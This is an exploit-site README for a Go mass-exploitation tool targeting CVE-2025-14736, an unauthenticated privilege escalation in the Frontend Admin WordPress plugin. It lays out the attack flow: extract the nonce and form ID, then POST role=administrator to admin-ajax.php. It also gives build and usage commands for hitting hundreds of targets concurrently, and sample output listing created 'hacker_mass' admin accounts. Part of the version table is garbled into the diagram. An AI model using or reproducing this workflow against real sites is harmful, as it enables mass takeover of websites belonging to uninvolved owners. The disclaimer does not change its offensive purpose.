Share
## https://sploitus.com/exploit?id=8CCF6314-E414-50A0-A4CB-B82AEE83AC86
# CVE-2025-14736
## Frontend Admin by DynamiApps - Unauthenticated Privilege Escalation
**Author:** Hyun Chiya
---
## Vulnerability Information
| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2025-14736 |
| **Plugin** | Frontend Admin by DynamiApps |
| **Affected Versions** | B["Extract Nonce (_acf_nonce) & Form ID (_acf_form)"]
B --> C["Construct POST payload with 'role'='administrator'"]
C --> D["POST to /wp-admin/admin-ajax.php"]
D --> E{"Verification"}
E -->|Success| F["New Admin User Created"]
style F fill:#ff6b6b,stroke:#c92a2a,color:#fff
```
## Prerequisites
1. Target has "Frontend Admin" plugin installed (vulnerable version).
2. A frontend registration form is enabled and accessible.
## Build
```bash
go build -o mass_exploit.exe mass_exploit.go
```
## Usage
### Mass Scan & Exploit
```bash
.\mass_exploit.exe -l list.txt -t 50
```
### Options
| Argument | Description |
|----------|-------------|
| `-l` | Path to list of target URLs (default: list.txt) |
| `-t` | Number of concurrent threads (default: 10) |
| `-timeout` | Request timeout in seconds (default: 15) |
## Example Output
```
>> [ ONLINE ]
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2025-14736 - Mass Exploit Tool โ
โ Frontend Admin by DynamiApps Privilege Escalation โ
โ Author: Hyun Chiya โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
>> [ INFORMATION ]
[*] Loaded 500 targets. Starting scan with 50 threads...
[SUCCESS] http://target.com | User: hacker_mass | Pass: Password123! | FormID: 48
[SUCCESS] http://example.org | User: hacker_mass | Pass: Password123! | FormID: 32
[*] Scan complete.
```
## Disclaimer
This tool is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Use responsibly.
## Author
**Hyun Chiya**